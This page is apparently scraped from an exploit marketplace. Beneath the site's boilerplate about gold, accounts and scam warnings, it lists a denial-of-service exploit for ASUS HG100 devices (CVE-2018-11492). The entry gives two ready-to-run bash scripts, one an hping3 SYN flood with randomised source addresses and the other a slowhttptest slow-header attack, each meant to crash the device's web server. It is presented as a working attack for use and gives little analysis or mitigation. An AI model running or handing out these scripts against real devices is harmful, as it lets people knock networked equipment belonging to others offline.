0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ASUS HG100 - Denial of Service Exploit
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS # Date: 2019-04-14 # Exploit Author: YinT Wang; # Vendor Homepage: www.asus.com # Version: Hardware version: HG100 、Firmware version: 1.05.12 # Tested on: Currnet 1.05.12 # CVE : CVE-2018-11492 1. Description The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492). 2.Proof of Concept Just Execute the following script in kali which could crash the devices 1. IPv4 packet and in result of devices crash.which written in linux script. #needed to co-operate with hping3 tool #with the time period at least 220s which could cause web server of HG100 devices crash #!/bin/bash read -p "enter the ip of HG100 here " url hping3 -V -c 10000 -S -w 64 --flood --rand-source $url sleep 220 echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s" exit 0 2.Slowhttp test and caused the devices crash.which written in linux script. #needed to co-operate with slowhttptest tool #with the time period 600s which could cause web server of HG100 devices crash #!/bin/bash read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url slowhttptest -H -R -c 10000 -l 600 -u $url sleep 600 echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s" exit 0 # 0day.today [2024-12-25] #